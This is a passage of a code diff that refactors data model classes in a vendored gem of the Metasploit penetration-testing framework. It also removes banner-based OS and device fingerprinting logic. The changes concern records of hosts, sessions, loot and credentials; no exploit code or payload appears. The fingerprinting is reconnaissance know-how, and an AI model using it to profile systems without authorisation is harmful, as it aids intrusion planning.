XXX - wname['Network Storage Router'] = wname['Network Storage Router'].to_i + points - wtype['device'] = wtype['device'].to_i + points - - when /Cisco Internetwork Operating System.*Version ([^\s]+)/ - vers = $1.split(/[,^\s]/)[0] - wname['Cisco IOS ' + vers] = wname['Cisco IOS ' + vers].to_i + points - wvers[vers] = wvers[vers].to_i + points - wtype['device'] = wtype['device'].to_i + points - - when /Cisco Catalyst.*Version ([^\s]+)/ - vers = $1.split(/[,^\s]/)[0] - wname['Cisco CatOS ' + vers] = wname['Cisco CatOS ' + vers].to_i + points - wvers[vers] = wvers[vers].to_i + points - wtype['device'] = wtype['device'].to_i + points - - when /Cisco 761.*Version ([^\s]+)/ - vers = $1.split(/[,^\s]/)[0] - wname['Cisco 761 ' + vers] = wname['Cisco 761 ' + vers].to_i + points - wvers[vers] = wvers[vers].to_i + points - wtype['device'] = wtype['device'].to_i + points - - when /Network Analysis Module.*Version ([^\s]+)/ - vers = $1.split(/[,^\s]/)[0] - wname['Cisco NAM ' + vers] = wname['Cisco NAM ' + vers].to_i + points - wvers[vers] = wvers[vers].to_i + points - wtype['device'] = wtype['device'].to_i + points - - when /VPN 3000 Concentrator Series Version ([^\s]+)/ - vers = $1.split(/[,^\s]/)[0] - wname['Cisco VPN 3000 ' + vers] = wname['Cisco VPN 3000 ' + vers].to_i + points - wvers[vers] = wvers[vers].to_i + points - wtype['device'] = wtype['device'].to_i + points - - when /ProCurve.*Switch/ - wname['3Com ProCurve Switch'] = wname['3Com ProCurve Switch'].to_i + points - wtype['device'] = wtype['device'].to_i + points - - when /ProCurve.*Access Point/ - wname['3Com Access Point'] = wname['3Com Access Point'].to_i + points - wtype['device'] = wtype['device'].to_i + points - - when /3Com.*Access Point/i - wname['3Com Access Point'] = wname['3Com Access Point'].to_i + points - wtype['device'] = wtype['device'].to_i + points - - when /ShoreGear/ - wname['ShoreTel Appliance'] = wname['ShoreTel Appliance'].to_i + points - wtype['device'] = wtype['device'].to_i + points - - when /firewall/i - wname['Unknown Firewall'] = wname['Unknown Firewall'].to_i + points - wtype['device'] = wtype['device'].to_i + points - - when /phone/i - wname['Unknown Phone'] = wname['Unknown Phone'].to_i + points - wtype['device'] = wtype['device'].to_i + points - - when /router/i - wname['Unknown Router'] = wname['Unknown Router'].to_i + points - wtype['device'] = wtype['device'].to_i + points - - when /switch/i - wname['Unknown Switch'] = wname['Unknown Switch'].to_i + points - wtype['device'] = wtype['device'].to_i + points - # - # Printer Signatures - # - when /^HP ETHERNET MULTI-ENVIRONMENT/ - wname['HP Printer'] = wname['HP Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /Canon/i - wname['Canon Printer'] = wname['Canon Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /Epson/i - wname['Epson Printer'] = wname['Epson Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /ExtendNet/i - wname['ExtendNet Printer'] = wname['ExtendNet Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /Fiery/i - wname['Fiery Printer'] = wname['Fiery Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /Konica/i - wname['Konica Printer'] = wname['Konica Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /Lanier/i - wname['Lanier Printer'] = wname['Lanier Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /Lantronix/i - wname['Lantronix Printer'] = wname['Lantronix Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /Lexmark/i - wname['Lexmark Printer'] = wname['Lexmark Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /Magicolor/i - wname['Magicolor Printer'] = wname['Magicolor Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /Minolta/i - wname['Minolta Printer'] = wname['Minolta Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /NetJET/i - wname['NetJET Printer'] = wname['NetJET Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /OKILAN/i - wname['OKILAN Printer'] = wname['OKILAN Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /Phaser/i - wname['Phaser Printer'] = wname['Phaser Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /PocketPro/i - wname['PocketPro Printer'] = wname['PocketPro Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /Ricoh/i - wname['Ricoh Printer'] = wname['Ricoh Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /Savin/i - wname['Savin Printer'] = wname['Savin Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /SHARP AR/i - wname['SHARP Printer'] = wname['SHARP Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /Star Micronix/i - wname['Star Micronix Printer'] = wname['Star Micronix Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /Source Tech/i - wname['Source Tech Printer'] = wname['Source Tech Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /Xerox/i - wname['Xerox Printer'] = wname['Xerox Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /^Brother/i - wname['Brother Printer'] = wname['Brother Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /^Axis.*Network Print/i - wname['Axis Printer'] = wname['Axis Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /^Prestige/i - wname['Prestige Printer'] = wname['Prestige Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /^ZebraNet/i - wname['ZebraNet Printer'] = wname['ZebraNet Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /e\-STUDIO/i - wname['eStudio Printer'] = wname['eStudio Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /^Gestetner/i - wname['Gestetner Printer'] = wname['Gestetner Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /IBM.*Print/i - wname['IBM Printer'] = wname['IBM Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /HP (Color|LaserJet|InkJet)/i - wname['HP Printer'] = wname['HP Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /Dell (Color|Laser|Ink)/i - wname['Dell Printer'] = wname['Dell Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - when /Print/i - wname['Unknown Printer'] = wname['Unknown Printer'].to_i + points - wtype['printer'] = wtype['printer'].to_i + points - end # End of s.info for SNMP - - when 'telnet' - points = 105 - case s.info - when /IRIX/ - wname['SGI IRIX'] = wname['SGI IRIX'].to_i + points - when /AIX/ - wname['IBM AIX'] = wname['IBM AIX'].to_i + points - when /(FreeBSD|OpenBSD|NetBSD)\/(.*) / - wname[$1] = wname[$1].to_i + points - arch = get_arch_from_string($2) - warch[arch] = warch[arch].to_i + points - when /Ubuntu (\d+(\.\d+)+)/ - wname['Linux'] = wname['Linux'].to_i + points - wflav['Ubuntu'] = wflav['Ubuntu'].to_i + points - wvers[$1] = wvers[$1].to_i + points - when /User Access Verification/ - wname['Cisco IOS'] = wname['Cisco IOS'].to_i + points - when /Microsoft/ - wname['Microsoft Windows'] = wname['Microsoft Windows'].to_i + points - end # End of s.info for TELNET - wtype['server'] = wtype['server'].to_i + points - - when 'smtp' - points = 103 - case s.info - when /ESMTP.*SGI\.8/ - wname['SGI IRIX'] = wname['SGI IRIX'].to_i + points - wtype['server'] = wtype['server'].to_i + points - end # End of s.info for SMTP - - when 'https' - points = 101 - case s.info - when /(VMware\s(ESXi?)).*\s([\d\.]+)/ - # Very reliable fingerprinting from our own esx_fingerprint module - wname[$1] = wname[$1].to_i + (points * 5) - wflav[$3] = wflav[$3].to_i + (points * 5) - wtype['device'] = wtype['device'].to_i + points - end # End of s.info for HTTPS - - when 'netbios' - points = 201 - case s.info - when /W2K3/i - wname['Microsoft Windows 2003'] = wname['Microsoft Windows 2003'].to_i + points - wtype['server'] = wtype['server'].to_i + points - when /W2K8/i - wname['Microsoft Windows 2008'] = wname['Microsoft Windows 2008'].to_i + points - wtype['server'] = wtype['server'].to_i + points - end # End of s.info for NETBIOS - - when 'dns' - points = 101 - case s.info - when 'Microsoft DNS' - wname['Microsoft Windows'] = wname['Microsoft Windows'].to_i + points - wtype['server'] = wtype['server'].to_i + points - end # End of s.info for DNS - end # End of s.name case - # End of Services - end - - # - # Report the best match here - # - best_match = {} - best_match[:os_name] = wname.keys.sort{|a,b| wname[b] <=> wname[a]}[0] - best_match[:purpose] = wtype.keys.sort{|a,b| wtype[b] <=> wtype[a]}[0] - best_match[:os_flavor] = wflav.keys.sort{|a,b| wflav[b] <=> wflav[a]}[0] - best_match[:os_sp] = wvers.keys.sort{|a,b| wvers[b] <=> wvers[a]}[0] - best_match[:arch] = warch.keys.sort{|a,b| warch[b] <=> warch[a]}[0] - best_match[:name] = whost.keys.sort{|a,b| whost[b] <=> whost[a]}[0] - best_match[:os_lang] = wlang.keys.sort{|a,b| wlang[b] <=> wlang[a]}[0] - - best_match[:os_flavor] ||= host[:os_flavor] || "" - if best_match[:os_name] - # Handle cases where the flavor contains the base name - # Don't use gsub!() here because the string was a hash key in a - # previously life and gets frozen on 1.9.1, see #4128 - best_match[:os_flavor] = best_match[:os_flavor].gsub(best_match[:os_name], '') - end - - # If we didn't get anything, use whatever the host already has. - # Failing that, fallback to "Unknown" - best_match[:os_name] ||= host[:os_name] || 'Unknown' - best_match[:purpose] ||= 'device' - - [:os_name, :purpose, :os_flavor, :os_sp, :arch, :name, :os_lang].each do |host_attr| - next if host.attribute_locked? host_attr - if best_match[host_attr] - host[host_attr] = Rex::Text.ascii_safe_hex(best_match[host_attr]) - end - end - - host.save if host.changed? - end - - protected - - # - # Convert a host.os.*_fingerprint Note into a hash containing the standard os_* fields - # - # Also includes a :certainty which is a float from 0 - 1.00 indicating the - # scanner's confidence in its fingerprint. If the particular scanner does - # not provide such information, defaults to 0.80. - # - # TODO: This whole normalize scanner procedure needs to be shoved off to its own - # mixin. It's far too long and convoluted, has a ton of repeated code, and is - # a massive hassle to update with new fingerprints. - def normalize_scanner_fp(fp) - return {} if not validate_fingerprint_data(fp) - ret = {} - data = fp.data - case fp.ntype - when 'host.os.session_fingerprint' - # These come from meterpreter sessions' client.sys.config.sysinfo - case data[:os] - when /Windows/ - ret.update(parse_windows_os_str(data[:os])) - when /Linux ([^[:space:]]*) ([^[:space:]]*) .* (\(.*\))/ - ret[:os_name] = "Linux" - ret[:name] = $1 - ret[:os_sp] = $2 - ret[:arch] = get_arch_from_string($3) - else - ret[:os_name] = data[:os] - end - ret[:arch] = data[:arch] if data[:arch] - ret[:name] = data[:name] if data[:name] - - when 'host.os.nmap_fingerprint', 'host.os.mbsa_fingerprint' - # :os_vendor=>"Microsoft" :os_family=>"Windows" :os_version=>"2000" :os_accuracy=>"94" - # - # :os_match=>"Microsoft Windows Vista SP0 or SP1, Server 2008, or Windows 7 Ultimate (build 7000)" - # :os_vendor=>"Microsoft" :os_family=>"Windows" :os_version=>"7" :os_accuracy=>"100" - ret[:certainty] = data[:os_accuracy].to_f / 100.0 - if (data[:os_vendor] == data[:os_family]) - ret[:os_name] = data[:os_family] - else - ret[:os_name] = data[:os_vendor] + " " + data[:os_family] - end - ret[:os_flavor] = data[:os_version] - ret[:name] = data[:hostname] if data[:hostname] - - when 'host.os.nexpose_fingerprint' - # :family=>"Windows" :certainty=>"0.85" :vendor=>"Microsoft" :product=>"Windows 7 Ultimate Edition" - # :family=>"Linux" :certainty=>"0.64" :vendor=>"Linux" :product=>"Linux" - # :family=>"Linux" :certainty=>"0.80" :vendor=>"Ubuntu" :product=>"Linux" - # :family=>"IOS" :certainty=>"0.80" :vendor=>"Cisco" :product=>"IOS" - # :family=>"embedded" :certainty=>"0.61" :vendor=>"Linksys" :product=>"embedded" - ret[:certainty] = data[:certainty].to_f - case data[:family] - when /AIX|ESX|Mac OS X|OpenSolaris|Solaris|IOS|Linux/ - if data[:vendor] == data[:family] - ret[:os_name] = data[:vendor] - else - # family often contains the vendor string, so rip it out to - # avoid useless duplication - ret[:os_name] = data[:vendor].to_s + " " + data[:family].to_s.gsub(data[:vendor].to_s, '').strip - end - when "Windows" - ret[:os_name] = "Microsoft Windows" - if data[:product] - if data[:product][/2008/] && data[:version].to_i == 7 - ret[:os_flavor] = "Windows 7" - ret[:type] = "client" - else - ret[:os_flavor] = data[:product].gsub("Windows", '').strip - ret[:os_sp] = data[:version] if data[:version] - if data[:product] - ret[:type] = "server" if data[:product][/Server/] - ret[:type] = "client" if data[:product][/^(XP|ME)$/] - end - end - end - when "embedded" - ret[:os_name] = data[:vendor] - else - ret[:os_name] = data[:vendor] - end - ret[:arch] = get_arch_from_string(data[:arch]) if data[:arch] - ret[:arch] ||= get_arch_from_string(data[:desc]) if data[:desc] - - when 'host.os.retina_fingerprint' - # :os=>"Windows Server 2003 (X64), Service Pack 2" - case data[:os] - when /Windows/ - ret.update(parse_windows_os_str(data[:os])) - else - # No idea what this looks like if it isn't windows. Just store - # the whole thing and hope for the best. XXX: Ghetto. =/ - ret[:os_name] = data[:os] - end - when 'host.os.nessus_fingerprint' - # :os=>"Microsoft Windows 2000 Advanced Server (English)" - # :os=>"Microsoft Windows 2000\nMicrosoft Windows XP" - # :os=>"Linux Kernel 2.6" - # :os=>"Sun Solaris 8" - # :os=>"IRIX 6.5" - - # Nessus sometimes jams multiple OS names together with a newline. - oses = data[:os].split(/\n/) - if oses.length > 1 - # Multiple fingerprints means Nessus wasn't really sure, reduce - # the certainty accordingly - ret[:certainty] = 0.5 - else - ret[:certainty] = 0.8 - end - - # Since there is no confidence associated with them, the best we - # can do is just take the first one. - case oses.first - when /Windows/ - ret.update(parse_windows_os_str(data[:os])) - - when /(2\.[46]\.\d+[-a-zA-Z0-9]+)/ - # Linux kernel version - ret[:os_name] = "Linux" - ret[:os_sp] = $1 - when /(.*)?((\d+\.)+\d+)$/ - # Then we don't necessarily know what the os is, but this - # fingerprint has some version information at the end, pull it - # off. - # When Nessus doesn't know what kind of linux it has, it gives an os like - # "Linux Kernel 2.6" - # The "Kernel" string is useless, so cut it off. - ret[:os_name] = $1.gsub("Kernel", '').strip - ret[:os_sp] = $2 - else - ret[:os_name] = oses.first - end - - ret[:name] = data[:hname] - when 'host.os.qualys_fingerprint' - # :os=>"Microsoft Windows 2000" - # :os=>"Windows 2003" - # :os=>"Microsoft Windows XP Professional SP3" - # :os=>"Ubuntu Linux" - # :os=>"Cisco IOS 12.0(3)T3" - case data[:os] - when /Windows/ - ret.update(parse_windows_os_str(data[:os])) - else - parts = data[:os].split(/\s+/, 3) - ret[:os_name] = "" - ret[:os_name] = parts[0] if parts[0] - ret[:os_name] << " " + parts[1] if parts[1] - ret[:os_sp] = parts[2] if parts[2] - end - # XXX: We should really be using smb_version's stored fingerprints - # instead of parsing the service info manually. Disable for now so we - # don't count smb twice. - #when 'smb.fingerprint' - # # smb_version is kind enough to store everything we need directly - # ret.merge(fp.data) - # # If it's windows, this should be a pretty high-confidence - # # fingerprint. Otherwise, it's samba which doesn't give us much of - # # anything in most cases. - # ret[:certainty] = 1.0 if fp.data[:os_name] =~ /Windows/ - when 'host.os.fusionvm_fingerprint' - case data[:os] - when /Windows/ - ret.update(parse_windows_os_str(data[:os])) - when /Linux ([^[:space:]]*) ([^[:space:]]*) .* (\(.*\))/ - ret[:os_name] = "Linux" - ret[:name] = $1 - ret[:os_sp] = $2 - ret[:arch] = get_arch_from_string($3) - else - ret[:os_name] = data[:os] - end - ret[:arch] = data[:arch] if data[:arch] - ret[:name] = data[:name] if data[:name] - else - # If you've fallen through this far, you've hit a generalized - # pass-through fingerprint parser. - ret[:os_name] = data[:os_name] || data[:os] || data[:os_fingerprint] || "" - ret[:type] = data[:os_purpose] if data[:os_purpose] - ret[:arch] = data[:os_arch] if data[:os_arch] - ret[:certainty] = data[:os_certainty] || 0.5 - end - ret[:certainty] ||= 0.8 - ret - end - - # - # Take a windows version string and return a hash with fields suitable for - # Host this object's version fields. - # - # A few example strings that this will have to parse: - # sessions - # Windows XP (Build 2600, Service Pack 3). - # Windows .NET Server (Build 3790). - # Windows 2008 (Build 6001, Service Pack 1). - # retina - # Windows Server 2003 (X64), Service Pack 2 - # nessus - # Microsoft Windows 2000 Advanced Server (English) - # qualys - # Microsoft Windows XP Professional SP3 - # Windows 2003 - # - # Note that this list doesn't include nexpose or nmap, since they are - # both kind enough to give us the various strings in seperate pieces - # that we don't have to parse out manually. - # - def parse_windows_os_str(str) - ret = {} - - ret[:os_name] = "Microsoft Windows" - arch = get_arch_from_string(str) - ret[:arch] = arch if arch - - if str =~ /(Service Pack|SP) ?(\d+)/ - ret[:os_sp] = "SP#{$2}" - end - - # Flavor - case str - when /\.NET Server/ - ret[:os_flavor] = "2003" - when /(XP|2000 Advanced Server|2000|2003|2008|SBS|Vista|7 .* Edition|7)/ - ret[:os_flavor] = $1 - else - # If we couldn't pull out anything specific for the flavor, just cut - # off the stuff we know for sure isn't it and hope for the best - ret[:os_flavor] ||= str.gsub(/(Microsoft )?Windows|(Service Pack|SP) ?(\d+)/, '').strip - end - - if str =~ /NT|2003|2008|SBS|Server/ - ret[:type] = 'server' - else - ret[:type] = 'client' - end - - ret - end - - # A case switch to return a normalized arch based on a given string. - def get_arch_from_string(str) - case str - when /x64|amd64|x86_64/i - "x64" - when /x86|i[3456]86/i - "x86" - when /PowerPC|PPC|POWER|ppc/ - "ppc" - when /SPARC/i - "sparc" - when /MIPS/i - "mips" - when /ARM/i - "arm" - else - nil - end - end - - } # end class_eval block +class Mdm::Host < ActiveRecord::Base + include Mdm::Host::OperatingSystemNormalization + + # + # Callbacks + # + + before_destroy :cleanup_tags + + # + # CONSTANTS + # + + # Fields searched for the search scope + SEARCH_FIELDS = [ + 'address::text', + 'hosts.name', + 'os_name', + 'os_flavor', + 'os_sp', + 'mac', + 'purpose', + 'comments' + ] + + # + # Relations + # + + has_many :exploit_attempts, :dependent => :destroy, :class_name => 'Mdm::ExploitAttempt' + has_many :exploited_hosts, :dependent => :destroy, :class_name => 'Mdm::ExploitedHost' + has_many :clients, :dependent => :delete_all, :class_name => 'Mdm::Client' + has_many :host_details, :dependent => :destroy, :class_name => 'Mdm::HostDetail' + # hosts_tags are cleaned up in before_destroy: + has_many :hosts_tags, :class_name => 'Mdm::HostTag' + has_many :loots, :dependent => :destroy, :class_name => 'Mdm::Loot', :order => 'loots.created_at desc' + has_many :notes, :dependent => :delete_all, :class_name => 'Mdm::Note', :order => 'notes.created_at' + has_many :services, :dependent => :destroy, :class_name => 'Mdm::Service', :order => 'services.port, services.proto' + has_many :sessions, :dependent => :destroy, :class_name => 'Mdm::Session', :order => 'sessions.opened_at' + has_many :vulns, :dependent => :delete_all, :class_name => 'Mdm::Vuln' + belongs_to :workspace, :class_name => 'Mdm::Workspace' + + # + # Through host_tags + # + has_many :tags, :through => :hosts_tags, :class_name => 'Mdm::Tag' + + # + # Through services + # + has_many :creds, :through => :services, :class_name => 'Mdm::Cred' + has_many :service_notes, :through => :services + has_many :web_sites, :through => :services, :class_name => 'Mdm::WebSite' + + # + # Nested Attributes + # @note Must be declared after relations being referenced. + # + + accepts_nested_attributes_for :services, :reject_if => lambda { |s| s[:port].blank? }, :allow_destroy => true + + # + # Validations + # + + validates :address, + :exclusion => { + :in => ['127.0.0.1'] + }, + :ip_format => true, + :presence => true, + :uniqueness => { + :scope => :workspace_id, + :unless => :ip_address_invalid? + } + validates :workspace, :presence => true + + # + # Scopes + # + + scope :alive, where({'hosts.state' => 'alive'}) + scope :flagged, where('notes.critical = true AND notes.seen = false').includes(:notes) + scope :search, + lambda { |*args| + # @todo replace with AREL + terms = SEARCH_FIELDS.collect { |field| + "#{field} ILIKE ?" + } + disjunction = terms.join(' OR ') + formatted_parameter = "%#{args[0]}%" + parameters = [formatted_parameter] * SEARCH_FIELDS.length + conditions = [disjunction] + parameters + + { + :conditions => conditions + } + } + scope :tag_search, + lambda { |*args| where("tags.name" => args[0]).includes(:tags) } + + def attribute_locked?(attr) + n = notes.find_by_ntype("host.updated.#{attr}") + n && n.data[:locked] end + + def cleanup_tags + # No need to keep tags with no hosts + tags.each do |tag| + tag.destroy if tag.hosts == [self] + end + # Clean up association table records + Mdm::HostTag.delete_all("host_id = #{self.id}") + end + + # This is replicated by the IpAddressValidator class. Had to put it here as well to avoid + # SQL errors when checking address uniqueness. + def ip_address_invalid? + begin + potential_ip = IPAddr.new(address) + return true unless potential_ip.ipv4? || potential_ip.ipv6? + rescue ArgumentError + return true + end + end + + def is_vm? + !!self.virtual_host + end + + ActiveSupport.run_load_hooks(:mdm_host, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/host_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/host_detail.rb index e8cc41eb5e..f99a6b320c 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/host_detail.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/host_detail.rb @@ -1,8 +1,15 @@ -module MetasploitDataModels::ActiveRecordModels::HostDetail - def self.included(base) - base.class_eval { - belongs_to :host, :class_name => "Mdm::Host", :counter_cache => :host_detail_count - validates :host_id, :presence => true - } - end +class Mdm::HostDetail < ActiveRecord::Base + # + # Relations + # + + belongs_to :host, :class_name => 'Mdm::Host', :counter_cache => :host_detail_count + + # + # Validations + # + + validates :host_id, :presence => true + + ActiveSupport.run_load_hooks(:mdm_host_detail, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/host_tag.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/host_tag.rb index 57948955d6..9301885d7f 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/host_tag.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/host_tag.rb @@ -1,10 +1,13 @@ -module MetasploitDataModels::ActiveRecordModels::HostTag - def self.included(base) - base.class_eval { - base.table_name = "hosts_tags" - belongs_to :host, :class_name => "Mdm::Host" - belongs_to :tag, :class_name => "Mdm::Tag" - } - end +class Mdm::HostTag < ActiveRecord::Base + self.table_name = "hosts_tags" + + # + # Relations + # + + belongs_to :host, :class_name => 'Mdm::Host' + belongs_to :tag, :class_name => 'Mdm::Tag' + + ActiveSupport.run_load_hooks(:mdm_host_tag, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/imported_cred.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/imported_cred.rb index 0c72598a5b..a65111b953 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/imported_cred.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/imported_cred.rb @@ -1,9 +1,10 @@ -module MetasploitDataModels::ActiveRecordModels::ImportedCred - def self.included(base) - base.class_eval{ +class Mdm::ImportedCred < ActiveRecord::Base + # + # Relations + # - belongs_to :workspace, :class_name => "Mdm::Workspace" - } - end + belongs_to :workspace, :class_name => "Mdm::Workspace" + + ActiveSupport.run_load_hooks(:mdm_imported_cred, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/listener.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/listener.rb index 75c0af9c53..dae8922fa8 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/listener.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/listener.rb @@ -1,14 +1,24 @@ -module MetasploitDataModels::ActiveRecordModels::Listener - def self.included(base) - base.class_eval{ +class Mdm::Listener < ActiveRecord::Base + # + # Relations + # - belongs_to :workspace, :class_name => "Mdm::Workspace" - belongs_to :task, :class_name => "Mdm::Task" + belongs_to :task, :class_name => 'Mdm::Task' + belongs_to :workspace, :class_name => 'Mdm::Workspace' - serialize :options, ::MetasploitDataModels::Base64Serializer.new - validates :address, :presence => true, :ip_format => true - validates :port, :presence => true - } - end + # + # Serializations + # + + serialize :options, MetasploitDataModels::Base64Serializer.new + + # + # Validations + # + + validates :address, :ip_format => true, :presence => true + validates :port, :presence => true + + ActiveSupport.run_load_hooks(:mdm_listener, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/loot.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/loot.rb index ec0ae2e0b1..0f343c318a 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/loot.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/loot.rb @@ -1,35 +1,63 @@ -module MetasploitDataModels::ActiveRecordModels::Loot - def self.included(base) - base.class_eval { +class Mdm::Loot < ActiveRecord::Base + # + # Callbacks + # - belongs_to :workspace, :class_name => "Mdm::Workspace" - belongs_to :host, :class_name => "Mdm::Host" - belongs_to :service, :class_name => "Mdm::Service" + before_destroy :delete_file - serialize :data, ::MetasploitDataModels::Base64Serializer.new + # + # CONSTANTS + # - before_destroy :delete_file + RELATIVE_SEARCH_FIELDS = [ + 'ltype', + 'name', + 'info', + 'data' + ] - scope :search, lambda { |*args| - where(["loots.ltype ILIKE ? OR " + - "loots.name ILIKE ? OR " + - "loots.info ILIKE ? OR " + - "loots.data ILIKE ?", - "%#{args[0]}%", "%#{args[0]}%", "%#{args[0]}%", "%#{args[0]}%" - ]) - } + # + # Relations + # - private + belongs_to :host, :class_name => 'Mdm::Host' + belongs_to :service, :class_name => 'Mdm::Service' + belongs_to :workspace, :class_name => 'Mdm::Workspace' - def delete_file - c = Pro::Client.get rescue nil - if c - c.loot_delete_file(self[:id]) - else - ::File.unlink(self.path) rescue nil - end - end + # + # Scopes + # + + scope :search, lambda { |*args| + # @todo replace with AREL + terms = RELATIVE_SEARCH_FIELDS.collect { |relative_field| + "loots.#{relative_field} ILIKE ?" } + disjunction = terms.join(' OR ') + formatted_parameter = "%#{args[0]}%" + parameters = [formatted_parameter] * RELATIVE_SEARCH_FIELDS.length + conditions = [disjunction] + parameters + + where(conditions) + } + + # + # Serializations + # + + serialize :data, MetasploitDataModels::Base64Serializer.new + + private + + def delete_file + c = Pro::Client.get rescue nil + if c + c.loot_delete_file(self[:id]) + else + ::File.unlink(self.path) rescue nil + end end + + ActiveSupport.run_load_hooks(:mdm_loot, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/macro.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/macro.rb index e9ccd50d1b..e6dcefb4fb 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/macro.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/macro.rb @@ -1,15 +1,20 @@ -module MetasploitDataModels::ActiveRecordModels::Macro - def self.included(base) - base.class_eval{ +class Mdm::Macro < ActiveRecord::Base + extend MetasploitDataModels::SerializedPrefs - extend MetasploitDataModels::SerializedPrefs + # + # Serialization + # - serialize :actions, ::MetasploitDataModels::Base64Serializer.new - serialize :prefs, ::MetasploitDataModels::Base64Serializer.new - serialized_prefs_attr_accessor :max_time + serialize :actions, MetasploitDataModels::Base64Serializer.new + serialize :prefs, MetasploitDataModels::Base64Serializer.new + serialized_prefs_attr_accessor :max_time - validates :name, :presence => true, :format => /^[^'|"]+$/ - } - end + # + # Validations + # + + validates :name, :presence => true, :format => /^[^'|"]+$/ + + ActiveSupport.run_load_hooks(:mdm_macro, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/mod_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/mod_ref.rb index cfbe57a40c..62592400df 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/mod_ref.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/mod_ref.rb @@ -1,6 +1,3 @@ -module MetasploitDataModels::ActiveRecordModels::ModRef - def self.included(base) - base.class_eval{ - } - end +class Mdm::ModRef < ActiveRecord::Base + ActiveSupport.run_load_hooks(:mdm_mod_ref, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_action.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_action.rb index 23e67da6f1..4263f6b1c6 100644 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_action.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_action.rb @@ -1,9 +1,16 @@ -module MetasploitDataModels::ActiveRecordModels::ModuleAction - def self.included(base) - base.class_eval{ - base.table_name = "module_actions" - belongs_to :module_detail - validate :name, :presence => true - } - end +class Mdm::ModuleAction < ActiveRecord::Base + self.table_name = 'module_actions' + + # + # Relations + # + + belongs_to :module_detail, :class_name => 'Mdm::ModuleDetail' + + # + # Validations + # + validate :name, :presence => true + + ActiveSupport.run_load_hooks(:mdm_module_action, self) end diff 